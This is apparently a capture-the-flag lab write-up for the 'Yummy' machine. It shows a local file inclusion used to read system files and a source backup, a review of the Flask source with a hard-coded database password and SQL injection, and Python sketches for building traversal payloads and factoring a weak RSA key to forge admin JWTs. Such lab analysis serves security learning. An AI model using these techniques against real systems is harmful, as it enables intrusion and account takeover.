LFI (Local File Inclusion)
LFI has been identified and confirmed at the export function of the iCalendar feature
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ cat ~/Downloads/passwd | grep -i /bin/bash
root:x:0:0:root:/root:/bin/bash
dev:x:1000:1000:dev:/home/dev:/bin/bash
qa:x:1001:1001::/home/qa:/bin/bash
These are the three accounts with a login shell (/bin/bash)
Continuing the enumeration through the LFI
Crontab
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh
Checking the crontab file reveals three cron jobs. app_backup.sh runs as www-data, while table_cleanup.sh and dbmonitor.sh run as mysql. All three scripts are located under the /data/scripts directory
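To keep track of which account runs which script, the entries can be split into schedule, user, and command. This is a minimal sketch, assuming the system-crontab layout shown above (five schedule fields followed by a user field); parse_cron_line and CronJob are hypothetical names introduced only for illustration.

```python
from typing import NamedTuple


class CronJob(NamedTuple):
    schedule: str
    user: str
    command: str


def parse_cron_line(line: str) -> CronJob:
    """Split a system-crontab entry: 5 schedule fields, a user, then the command."""
    fields = line.split(None, 6)
    if len(fields) < 7:
        raise ValueError(f"not a system crontab entry: {line!r}")
    return CronJob(" ".join(fields[:5]), fields[5], fields[6])


# The three entries read through the LFI
CRONTAB = """\
*/1 * * * * www-data /bin/bash /data/scripts/app_backup.sh
*/15 * * * * mysql /bin/bash /data/scripts/table_cleanup.sh
* * * * * mysql /bin/bash /data/scripts/dbmonitor.sh
"""

jobs = [parse_cron_line(line) for line in CRONTAB.splitlines() if line.strip()]
for job in jobs:
    print(f"{job.user:<9} {job.schedule:<13} {job.command}")
```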
app_backup.sh
#!/bin/bash
cd /var/www
/usr/bin/rm backupapp.zip
/usr/bin/zip -r backupapp.zip /opt/app
The app_backup.sh file is a Bash script that archives the web application located at /opt/app to the /var/www directory
I can obtain that backupapp.zip file via the same LFI method
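A minimal sketch of why a traversal sequence reaches /var/www/backupapp.zip, assuming (as the source code further down confirms) that the export handler joins a temporary directory with the user-supplied file name. The temp_dir value below is hypothetical, and resolve is an illustrative helper, not part of the target application.

```python
import posixpath


def resolve(temp_dir: str, filename: str) -> str:
    """Join a base directory with a user-supplied name, then normalise the result."""
    return posixpath.normpath(posixpath.join(temp_dir, filename))


temp_dir = "/tmp/tmpabc123"          # hypothetical value of the app's temp_dir
target = "/var/www/backupapp.zip"    # file produced by app_backup.sh

# One "../" per component of temp_dir is enough to climb back to /
depth = len([part for part in temp_dir.split("/") if part])
payload = "../" * depth + target.lstrip("/")

print(payload)
print(resolve(temp_dir, payload))
```

Extra "../" segments are harmless because the path cannot climb above /, so padding the payload with more of them works when the depth of the temporary directory is unknown.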
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ mv ~/Downloads/backupapp.zip .
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ unzip -q backupapp.zip
Extracting content
Source Code Analysis
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ ll .
total 6.6M
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 .
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 opt
6.5M -rw-rw-r-- 1 kali kali 6.5M Oct 6 06:19 backupapp.zip
4.0K drwxr-xr-x 146 kali kali 4.0K Oct 6 03:52 ..
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ ll opt/app/
total 40K
4.0K drwxrwxr-x 7 kali kali 4.0K Oct 6 06:29 .
4.0K drwxrwxr-x 3 kali kali 4.0K Oct 6 06:20 ..
4.0K drwxrwxr-x 2 kali kali 4.0K Sep 30 10:16 __pycache__
4.0K drwxr-xr-x 3 kali kali 4.0K Sep 30 10:16 config
4.0K drwxr-xr-x 3 kali kali 4.0K Sep 30 10:16 middleware
4.0K drwxr-xr-x 6 kali kali 4.0K Sep 30 10:16 static
4.0K drwxr-xr-x 2 kali kali 4.0K Sep 30 10:16 templates
12K -rw-r--r-- 1 kali kali 12K Sep 25 15:54 app.py
This is the root directory of the web application
app.py
┌──(kali㉿kali)-[~/…/labs/yummy/opt/app]
└─$ cat app.py
from flask import Flask, request, send_file, render_template, redirect, url_for, flash, jsonify, make_response
import tempfile
import os
import shutil
from datetime import datetime, timedelta, timezone
from urllib.parse import quote
from ics import Calendar, Event
from middleware.verification import verify_token
from config import signature
import pymysql.cursors
from pymysql.constants import CLIENT
import jwt
import secrets
import hashlib
app = Flask(__name__, static_url_path='/static')
temp_dir = ''
app.secret_key = secrets.token_hex(32)
db_config = {
    'host': '127.0.0.1',
    'user': 'chef',
    'password': '3wDo7gSRZIwIHRxZ!',
    'database': 'yummy_db',
    'cursorclass': pymysql.cursors.DictCursor,
    'client_flag': CLIENT.MULTI_STATEMENTS
}
access_token = ''
@app.route('/login', methods=['GET','POST'])
def login():
    global access_token
    if request.method == 'GET':
        return render_template('login.html', message=None)
    elif request.method == 'POST':
        email = request.json.get('email')
        password = request.json.get('password')
        password2 = hashlib.sha256(password.encode()).hexdigest()
        if not email or not password:
            return jsonify(message="email or password is missing"), 400
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "SELECT * FROM users WHERE email=%s AND password=%s"
                cursor.execute(sql, (email, password2))
                user = cursor.fetchone()
                if user:
                    payload = {
                        'email': email,
                        'role': user['role_id'],
                        'iat': datetime.now(timezone.utc),
                        'exp': datetime.now(timezone.utc) + timedelta(seconds=3600),
                        'jwk':{'kty': 'RSA',"n":str(signature.n),"e":signature.e}
                    }
                    access_token = jwt.encode(payload, signature.key.export_key(), algorithm='RS256')
                    response = make_response(jsonify(access_token=access_token), 200)
                    response.set_cookie('X-AUTH-Token', access_token)
                    return response
                else:
                    return jsonify(message="Invalid email or password"), 401
        finally:
            connection.close()
@app.route('/logout', methods=['GET'])
def logout():
    response = make_response(redirect('/login'))
    response.set_cookie('X-AUTH-Token', '')
    return response
@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'GET':
        return render_template('register.html', message=None)
    elif request.method == 'POST':
        role_id = 'customer_' + secrets.token_hex(4)
        email = request.json.get('email')
        password = hashlib.sha256(request.json.get('password').encode()).hexdigest()
        if not email or not password:
            return jsonify(error="email or password is missing"), 400
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "SELECT * FROM users WHERE email=%s"
                cursor.execute(sql, (email,))
                existing_user = cursor.fetchone()
                if existing_user:
                    return jsonify(error="Email already exists"), 400
                else:
                    sql = "INSERT INTO users (email, password, role_id) VALUES (%s, %s, %s)"
                    cursor.execute(sql, (email, password, role_id))
                    connection.commit()
                    return jsonify(message="User registered successfully"), 201
        finally:
            connection.close()
@app.route('/', methods=['GET', 'POST'])
def index():
    return render_template('index.html')
@app.route('/book', methods=['GET', 'POST'])
def export():
    if request.method == 'POST':
        try:
            name = request.form['name']
            date = request.form['date']
            time = request.form['time']
            email = request.form['email']
            num_people = request.form['people']
            message = request.form['message']
            connection = pymysql.connect(**db_config)
            try:
                with connection.cursor() as cursor:
                    sql = "INSERT INTO appointments (appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message, role_id) VALUES (%s, %s, %s, %s, %s, %s, %s)"
                    cursor.execute(sql, (name, email, date, time, num_people, message, 'customer'))
                    connection.commit()
                    flash('Your booking request was sent. You can manage your appointment further from your account. Thank you!', 'success')
            except Exception as e:
                print(e)
            return redirect('/#book-a-table')
        except ValueError:
            flash('Error processing your request. Please try again.', 'error')
    return render_template('index.html')
def generate_ics_file(name, date, time, email, num_people, message):
    global temp_dir
    temp_dir = tempfile.mkdtemp()
    current_date_time = datetime.now()
    formatted_date_time = current_date_time.strftime("%Y%m%d_%H%M%S")
    cal = Calendar()
    event = Event()
    event.name = name
    event.begin = datetime.strptime(date, "%Y-%m-%d")
    event.description = f"Email: {email}\nNumber of People: {num_people}\nMessage: {message}"
    cal.events.add(event)
    temp_file_path = os.path.join(temp_dir, quote('Yummy_reservation_' + formatted_date_time + '.ics'))
    with open(temp_file_path, 'w') as fp:
        fp.write(cal.serialize())
    return os.path.basename(temp_file_path)
@app.route('/export/<path:filename>')
def export_file(filename):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    filepath = os.path.join(temp_dir, filename)
    if os.path.exists(filepath):
        content = send_file(filepath, as_attachment=True)
        shutil.rmtree(temp_dir)
        return content
    else:
        shutil.rmtree(temp_dir)
        return "File not found", 404
def validate_login():
    try:
        (email, current_role), status_code = verify_token()
        if email and status_code == 200 and current_role == "administrator":
            return current_role
        elif email and status_code == 200:
            return email
        else:
            raise Exception("Invalid token")
    except Exception as e:
        return None
@app.route('/dashboard', methods=['GET', 'POST'])
def dashboard():
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    elif validation == "administrator":
        return redirect(url_for('admindashboard'))
    connection = pymysql.connect(**db_config)
    try:
        with connection.cursor() as cursor:
            sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
            cursor.execute(sql, (validation,))
            connection.commit()
            appointments = cursor.fetchall()
            appointments_sorted = sorted(appointments, key=lambda x: x['appointment_id'])
    finally:
        connection.close()
    return render_template('dashboard.html', appointments=appointments_sorted)
@app.route('/delete/<appointID>')
def delete_file(appointID):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    elif validation == "administrator":
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "DELETE FROM appointments where appointment_id= %s;"
                cursor.execute(sql, (appointID,))
                connection.commit()
                sql = "SELECT * from appointments"
                cursor.execute(sql)
                connection.commit()
                appointments = cursor.fetchall()
        finally:
            connection.close()
            flash("Reservation deleted successfully","success")
            return redirect(url_for("admindashboard"))
    else:
        connection = pymysql.connect(**db_config)
        try:
            with connection.cursor() as cursor:
                sql = "DELETE FROM appointments WHERE appointment_id = %s AND appointment_email = %s;"
                cursor.execute(sql, (appointID, validation))
                connection.commit()
                sql = "SELECT appointment_id, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s"
                cursor.execute(sql, (validation,))
                connection.commit()
                appointments = cursor.fetchall()
        finally:
            connection.close()
            flash("Reservation deleted successfully","success")
            return redirect(url_for("dashboard"))
    flash("Something went wrong!","error")
    return redirect(url_for("dashboard"))
@app.route('/reminder/<appointID>')
def reminder_file(appointID):
    validation = validate_login()
    if validation is None:
        return redirect(url_for('login'))
    connection = pymysql.connect(**db_config)
    try:
        with connection.cursor() as cursor:
            sql = "SELECT appointment_id, appointment_name, appointment_email, appointment_date, appointment_time, appointment_people, appointment_message FROM appointments WHERE appointment_email = %s AND appointment_id = %s"
            result = cursor.execute(sql, (validation, appointID))
            if result != 0:
                connection.commit()
                appointments = cursor.fetchone()
                filename = generate_ics_file(appointments['appointment_name'], appointments['appointment_date'], appointments['appointment_time'], appointments['appointment_email'], appointments['appointment_people'], appointments['appointment_message'])
                connection.close()
                flash("Reservation downloaded successfully","success")
                return redirect(url_for('export_file', filename=filename))
            else:
                flash("Something went wrong!","error")
    except:
        flash("Something went wrong!","error")
    return redirect(url_for("dashboard"))
@app.route('/admindashboard', methods=['GET', 'POST'])
def admindashboard():
    validation = validate_login()
    if validation != "administrator":
        return redirect(url_for('login'))
    try:
        connection = pymysql.connect(**db_config)
        with connection.cursor() as cursor:
            sql = "SELECT * from appointments"
            cursor.execute(sql)
            connection.commit()
            appointments = cursor.fetchall()
            search_query = request.args.get('s', '')
            # added option to order the reservations
            order_query = request.args.get('o', '')
            sql = f"SELECT * FROM appointments WHERE appointment_email LIKE %s order by appointment_date {order_query}"
            cursor.execute(sql, ('%' + search_query + '%',))
            connection.commit()
            appointments = cursor.fetchall()
        connection.close()
        return render_template('admindashboard.html', appointments=appointments)
    except Exception as e:
        flash(str(e), 'error')
        return render_template('admindashboard.html', appointments=appointments)
if __name__ == '__main__':
    app.run(threaded=True, debug=False, host='0.0.0.0', port=3000)
- There is a DB credential disclosure: chef:3wDo7gSRZIwIHRxZ!
  - The DB is yummy_db
- JWT uses a custom signature verification: from config import signature
- The export_file function is vulnerable to LFI as there is no input sanitization in place
  - It only checks the file with the os.path.exists method and sends out the file if it exists
- There is a hidden endpoint, /admindashboard, only available to the administrator
  - This is done by checking the role attribute in the JWT
  - This endpoint has a SQLi vulnerability in the order_query part of the SQL query
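The order_query finding can be illustrated without a database. The sketch below rebuilds the query string the same way admindashboard does, then contrasts it with an allow-list variant. The payload, ALLOWED_ORDERS, and both function names are hypothetical illustrations, not part of the target code. Since db_config enables CLIENT.MULTI_STATEMENTS, a stacked statement such as the one shown is plausibly accepted by the server, but that is an assumption to verify against the live target.

```python
ALLOWED_ORDERS = {"ASC", "DESC"}  # hypothetical allow-list


def build_query_unsafe(order_query: str) -> str:
    """Same string interpolation as admindashboard(): 'o' lands in the SQL text."""
    return (
        "SELECT * FROM appointments WHERE appointment_email LIKE %s "
        f"order by appointment_date {order_query}"
    )


def build_query_safe(order_query: str) -> str:
    """Only ever emit a sort direction taken from the allow-list."""
    order = order_query.strip().upper()
    if order not in ALLOWED_ORDERS:
        order = "ASC"
    return (
        "SELECT * FROM appointments WHERE appointment_email LIKE %s "
        f"ORDER BY appointment_date {order}"
    )


injected = "ASC; SELECT SLEEP(5)"  # hypothetical payload for the 'o' parameter
print(build_query_unsafe(injected))
print(build_query_safe(injected))
```

The %s placeholder for the search term is still bound by the driver, so only the sort direction is attacker-controlled text in the unsafe variant.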
config/signature.py
┌──(kali㉿kali)-[~/…/labs/yummy/opt/app]
└─$ cat config/signature.py
#!/usr/bin/python3
from Crypto.PublicKey import RSA
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import sympy
# Generate RSA key pair
q = sympy.randprime(2**19, 2**20)
n = sympy.randprime(2**1023, 2**1024) * q
e = 65537
p = n // q
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
key_data = {'n': n, 'e': e, 'd': d, 'p': p, 'q': q}
key = RSA.construct((key_data['n'], key_data['e'], key_data['d'], key_data['p'], key_data['q']))
private_key_bytes = key.export_key()
private_key = serialization.load_pem_private_key(
    private_key_bytes,
    password=None,
    backend=default_backend()
)
public_key = private_key.public_key()
RSA's security relies on the difficulty of factoring the modulus. If one of the two primes is too small, the modulus becomes easy to factor, which defeats the purpose of RSA encryption and signing. In the code above, q is so small that the modulus n can be factored very quickly, even with a simple method like trial division.
- Weak prime generation (q):
  - q is generated as a prime in the range $2^{19}$ to $2^{20}$, which is far too small for cryptographic purposes.
  - When one prime is this small, the modulus n = p * q can be factored easily: the other prime, p = n // q, is large, but it follows immediately once q is known.
- Factoring the modulus (n):
  - With n being the product of a small prime q and a large prime p, an attacker can quickly factor n by trial division or a more sophisticated factoring method.
  - Once n is factored, both p and q are known, and the private exponent d can be computed as $d \equiv e^{-1} \pmod{\varphi(n)}$, where $\varphi(n) = (p - 1)(q - 1)$.
  - With the private exponent d, they can sign any data, including a forged administrative JWT (JSON Web Token), which is disastrous for a system relying on that RSA key pair for authentication.
If an attacker knows the modulus n and the public exponent e (both are public in RSA, and app.py additionally embeds them in the jwk claim of every issued token), they can:
- Factor n to find p and q (since q is small).
- Calculate the private exponent d as $d \equiv e^{-1} \pmod{(p - 1)(q - 1)}$.
- Sign arbitrary data with d (such as an administrative JWT) and impersonate an admin.
To make the RSA key pair secure:
- Both p and q must be large enough (typically at least 1024 bits each for a 2048-bit modulus).
- In the case above, q is only about 20 bits, which is drastically smaller than it should be. This makes n insecure.
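The recovery steps can be sketched in a few lines. This is a toy example under stated assumptions: q_demo is a known prime inside the same $2^{19}$ to $2^{20}$ range, while p_demo (the Mersenne prime $2^{127} - 1$) merely stands in for the 1024-bit prime used by signature.py. The function names are illustrative only.

```python
from typing import Tuple


def factor_small_prime(n: int, limit: int = 2**20) -> Tuple[int, int]:
    """Trial division: return (q, p) where q is a factor of n below `limit`."""
    if n % 2 == 0:
        return 2, n // 2
    for candidate in range(3, limit, 2):
        if n % candidate == 0:
            return candidate, n // candidate
    raise ValueError("no factor found below limit")


def recover_private_exponent(n: int, e: int) -> Tuple[int, int, int]:
    """Factor n, then derive d = e^-1 mod (p - 1)(q - 1), mirroring signature.py."""
    q, p = factor_small_prime(n)
    phi_n = (p - 1) * (q - 1)
    d = pow(e, -1, phi_n)  # modular inverse, Python 3.8+
    return p, q, d


# Toy key: small prime in [2**19, 2**20) times a stand-in large prime
q_demo = 1_000_003
p_demo = 2**127 - 1
e = 65537
n = p_demo * q_demo

p, q, d = recover_private_exponent(n, e)

# Sanity check: a raw RSA signature made with the recovered d verifies with (n, e)
message = 42
signature = pow(message, d, n)
print(pow(signature, e, n) == message)
```

The loop tests at most about half a million odd candidates, so the cost is dominated by the size of q rather than the size of n.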
Moving on to JWT Forgery
table_cleanup.sh
#!/bin/sh
/usr/bin/mysql -h localhost -u chef yummy_db -p'3wDo7gSRZIwIHRxZ!' < /data/scripts/sqlappointments.sql
The table_cleanup.sh file is a shell script that seems to reset the database to its original state by feeding /data/scripts/sqlappointments.sql to the mysql client
It contains the same DB credential found earlier
dbmonitor.sh
#!/bin/bash
timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)
if [ "$response" != 'active' ]; then
    /usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
    /usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
    latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
    /bin/bash "$latest_version"
else
    if [ -f /data/scripts/dbstatus.json ]; then
        if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
            /usr/bin/echo "The database was down at $timestamp. Sending notification."
            /usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
            /usr/bin/rm -f /data/scripts/dbstatus.json
        else
            /usr/bin/rm -f /data/scripts/dbstatus.json
            /usr/bin/echo "The automation failed in some way, attempting to fix it."
            latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
            /bin/bash "$latest_version"
        fi
    else
        /usr/bin/echo "Response is OK."
    fi
fi
[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json
The script monitors the status of the MySQL service, performs actions if it detects that the service is down, and attempts to restart it using a script named fixer-v*. Additionally, it logs and sends notifications when the service status changes.
Step-by-Step Breakdown:
- Shebang Line:
#!/bin/bash
This indicates that the script is executed using the Bash shell.
- Capturing Timestamp and Service Status:
timestamp=$(/usr/bin/date)
service=mysql
response=$(/usr/bin/systemctl is-active mysql)
- timestamp: Stores the current date and time using the /usr/bin/date command.
- service: Stores the name of the service being monitored (mysql).
- response: Stores the output of /usr/bin/systemctl is-active mysql, which checks if the MySQL service is running. The possible values can be active, inactive, etc.
- Checking if MySQL is Down:
if [ "$response" != 'active' ]; then
If the response is anything other than active, this condition triggers the following actions (MySQL service is considered down).
- Log the Down Status and Attempt to Restart:
/usr/bin/echo "{\"status\": \"The database is down\", \"time\": \"$timestamp\"}" > /data/scripts/dbstatus.json
/usr/bin/echo "$service is down, restarting!!!" | /usr/bin/mail -s "$service is down!!!" root
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
- The script logs the MySQL down status with a timestamp in /data/scripts/dbstatus.json.
- It sends an email to root notifying that the MySQL service is down, using the mail command.
- The script finds the latest version of a script named fixer-v* located in /data/scripts/. This is done by:
  - Listing all files matching the pattern fixer-v* using ls -1.
  - Sorting them using version sorting (/usr/bin/sort -V).
  - Picking the latest file using tail -n 1.
- The latest version of the fixer script is executed using /bin/bash "$latest_version" to attempt to restart or fix the service.
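The selection step (ls, sort -V, tail -n 1) decides which file ends up being executed, so it is worth modelling. The sketch below is an approximation of version sorting, not GNU sort's exact algorithm: it compares digit runs as integers and everything else as text. The candidate file names are hypothetical.

```python
import re
from typing import List, Optional, Tuple, Union

Token = Tuple[int, Union[int, str]]


def version_key(name: str) -> List[Token]:
    """Split into digit and non-digit runs so numeric parts compare as integers."""
    return [
        (1, int(tok)) if tok.isdigit() else (0, tok)
        for tok in re.findall(r"\d+|\D+", name)
    ]


def pick_latest(paths: List[str]) -> Optional[str]:
    """Rough equivalent of `ls -1 ... | sort -V | tail -n 1`."""
    return max(paths, key=version_key) if paths else None


# Hypothetical directory contents
candidates = [
    "/data/scripts/fixer-v1",
    "/data/scripts/fixer-v2",
    "/data/scripts/fixer-v10",
    "/data/scripts/fixer-v1.5",
]
print(pick_latest(candidates))
```

A plain lexical sort would rank fixer-v2 above fixer-v10; with version ordering, the highest numeric suffix wins.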
- Handling the Case Where MySQL is Up:
else
if [ -f /data/scripts/dbstatus.json ]; then
If the MySQL service is active, the script checks if the dbstatus.json file exists (which would indicate that the service was previously down).
- Database Recovery After Being Down:
if grep -q "database is down" /data/scripts/dbstatus.json 2>/dev/null; then
/usr/bin/echo "The database was down at $timestamp. Sending notification."
/usr/bin/echo "$service was down at $timestamp but came back up." | /usr/bin/mail -s "$service was down!" root
/usr/bin/rm -f /data/scripts/dbstatus.json
If the dbstatus.json file contains “database is down” (indicating the MySQL service was previously down), the script:
- Logs that the database was down but has come back up.
- Sends an email to root informing them that the MySQL service has recovered.
- Deletes the dbstatus.json file since the issue has been resolved.
- Handling a Failed Automation Fix:
else
/usr/bin/rm -f /data/scripts/dbstatus.json
/usr/bin/echo "The automation failed in some way, attempting to fix it."
latest_version=$(/usr/bin/ls -1 /data/scripts/fixer-v* 2>/dev/null | /usr/bin/sort -V | /usr/bin/tail -n 1)
/bin/bash "$latest_version"
- If the dbstatus.json file exists but does not contain “database is down”, the script assumes the previous attempt to fix the issue failed.
- It runs the latest fixer-v* script again to attempt another fix.
- It also removes the dbstatus.json file, possibly to ensure a clean state for future operations.
- MySQL is Running Normally:
else
/usr/bin/echo "Response is OK."
If there is no dbstatus.json file and MySQL is running (response = active), the script prints that the service is running normally.
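- Cleaning Up the dbstatus.json File:
[ -f dbstatus.json ] && /usr/bin/rm -f dbstatus.json
This final line ensures that any lingering dbstatus.json file in the current working directory (if it exists) is removed. Note that the path is relative here, so it only matches /data/scripts/dbstatus.json when the script's working directory is /data/scripts.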
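The branches walked through above reduce to a small decision table. The following sketch models them as a pure function, so it is easy to see which inputs lead to the fixer script being run. The action labels and the function name are hypothetical; only the branching mirrors dbmonitor.sh.

```python
from typing import List, Optional


def dbmonitor_actions(response: str, status_content: Optional[str]) -> List[str]:
    """Model dbmonitor.sh's branching.

    response:       output of `systemctl is-active mysql`
    status_content: contents of /data/scripts/dbstatus.json, or None if absent
    """
    if response != "active":
        # MySQL is down: record it, notify root, run the newest fixer-v* script
        return ["write_status_file", "mail_root", "run_latest_fixer"]
    if status_content is None:
        return ["print_ok"]
    if "database is down" in status_content:
        # MySQL recovered since the last run
        return ["mail_root", "remove_status_file"]
    # Status file exists but lacks the marker: treated as a failed automation
    return ["remove_status_file", "run_latest_fixer"]


print(dbmonitor_actions("inactive", None))
print(dbmonitor_actions("active", '{"status": "The database is down"}'))
print(dbmonitor_actions("active", "anything else"))
```

Two of the four paths end in run_latest_fixer, and the second one is reached while MySQL is healthy, as long as dbstatus.json exists without the expected marker.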